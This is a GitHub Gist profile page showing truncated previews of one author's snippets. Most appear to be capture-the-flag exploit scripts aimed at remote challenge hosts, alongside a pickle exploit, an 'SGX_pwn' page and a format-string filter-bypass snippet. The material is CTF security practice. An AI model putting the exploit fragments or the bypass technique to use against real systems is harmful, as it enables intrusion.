Skip to content

Instantly share code, notes, and snippets.

peternguyen93

View GitHub Profile
View 3pigs.py
#!/usr/bin/python
# Author : peternguyen
from struct import *
from base64 import b64encode,b64decode
import requests
import re
import hashlib
import random
View bypass.py
target = 'UOTp%I()<>S'
out = ''
for c in target:
found = False
for func_name in dir("")[::-1]:
try:
doc = getattr(getattr("",func_name),"__doc__")
if c in doc:
idx = doc.find(c)
out += "{0.%s.__doc__[%d]}" % (func_name,idx)
View mute_pig.py
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
p = Pwn(mode=1,host='47.75.128.158',port=9999)
def alloc(name,type):
p.sendint(1)
p.sendint(type)
View python_revenge_exploit.py
import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
View WhiteHat2017_objdump.py
from Pwn import *
p = Pwn(mode=1)
def pA32(*args):
binary = ''
for arg in args:
binary += p.p32(arg)
return binary
View ghost_in_the_heap.py
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
# p = Pwn(mode=1,port=8887)
p = Pwn(mode=1,host='52.193.196.17',port=56746)
def select(op):
p.read_until('Your choice: ')
View SGX_pwn.html
<!DOCTYPE html>
<html>
<head>
<title>SGX PWN</title>
</head>
<body>
<h1>PWN!!!</h1>
<script type="text/javascript">
function print(text)
{
View 1000levels.py
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import re
p = Pwn(host='47.74.147.103',port=20001,mode=1)
# p = Pwn(mode=1)
def exploit(**kargs):
View Makefile_simple_driver
obj-m+=ebbchar.o
all:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules
$(CC) testebbchar.c -o test
clean:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean
rm test
You can’t perform that action at this time.